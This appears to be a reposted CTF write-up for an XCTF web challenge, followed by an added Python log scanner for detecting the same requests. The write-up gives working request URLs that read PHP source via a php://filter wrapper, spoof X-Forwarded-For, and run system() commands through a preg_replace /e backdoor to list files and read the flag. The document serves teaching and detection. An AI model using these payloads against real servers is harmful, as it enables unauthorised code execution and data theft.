[CTF] File inclusion (php pseudo-protocol) + code execution (XCTF 4th-CyberEarth)

Author: admin

[Principle]
File inclusion used to read source code; X-Forwarded-For

preg_replace performs a regular expression search and replace. When the regular expression part passed to preg_replace carries the e modifier, the replacement part is executed as PHP code rather than inserted as text.

[Objective]
Master regular expressions and reading source code through a pseudo-protocol

[Environment]
Windows

[Tools]
Firefox, Burp

[Procedure]
1. Access the cloud platform equipment maintenance center page and read its source code using the php pseudo-protocol.

http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php

2. Base64-decode the obtained source. In the decoded index.php, a back door can be found at line 121, as shown in the figure.

3. Auditing this section of code shows that X_FORWARDED_FOR must be 127.0.0.1, and that three parameters received via GET are passed on to preg_replace.

About the preg_replace function:

This is really about regular expression matching in PHP; I need to write a separate blog post on regular expressions. Stay tuned....

4. In Burp, modify the HTTP request headers to add X_FORWARDED_FOR, and set the URL to

/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa to list the files, as shown in the figure.

5. Change the URL to /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa to view the s3chahahaDir folder, where the flag folder is found.

6. Change the URL to /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa to view the flag folder, where the flag.php file is found.

7. Change the URL to /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa to view the flag, as shown in the figure.
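As an added defender-side example (not part of the original write-up), here is a small Python scanner that checks access-log entries for the two request shapes used above: a php:// wrapper in a query parameter (source disclosure through file inclusion) and a user-supplied PCRE pattern carrying the e modifier (preg_replace code execution). The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); the first two
# mirror the requests in the write-up, the last two are benign.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 8123
10.0.0.7 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?pat=/(.*)/e&rep=system('ls')&sub=aa HTTP/1.1" 200 211
10.0.0.8 - - [01/Jan/2020:10:01:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 3400
10.0.0.9 - - [01/Jan/2020:10:02:00 +0000] "GET /index.php?pat=/foo/i&rep=bar&sub=foobar HTTP/1.1" 200 20
"""

_REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
_PAIRS = {'(': ')', '[': ']', '{': '}', '<': '>'}  # bracket-style PCRE delimiters

def pcre_modifiers(pattern):
    """Trailing modifier letters of a delimited PCRE string ('' if none), or
    None when the value is not shaped like a PHP regex at all."""
    s = pattern.lstrip()
    if not s or s[0].isalnum() or s[0] in '\\ ':  # PHP forbids these as delimiters
        return None
    close = _PAIRS.get(s[0], s[0])
    end = s.rfind(close)
    if end <= 0:
        return None
    mods = s[end + 1:].strip()
    return mods if mods == '' or mods.isalpha() else None

def inspect_request(path_and_query):
    """Findings for one request target (path plus query string)."""
    findings = []
    for key, value in parse_qsl(urlsplit(path_and_query).query, keep_blank_values=True):
        if value.lower().startswith('php://'):
            findings.append(f'php wrapper in parameter {key}')
        mods = pcre_modifiers(value)
        if mods and 'e' in mods:
            findings.append(f'/e modifier in parameter {key}')
    return findings

def scan_log(text):
    """Return (client, request, findings) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = _REQ.search(line)
        findings = inspect_request(m.group(1)) if m else []
        if findings:
            hits.append((line.split(' ', 1)[0], m.group(1), findings))
    return hits
```

The pattern check accepts any non-alphanumeric delimiter and the four bracket pairs, so it also catches variants such as `(.*)e` or `#.*#e`, not only the `/(.*)/e` form used in this challenge.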

Origin www.cnblogs.com/-mo-/p/11572416.html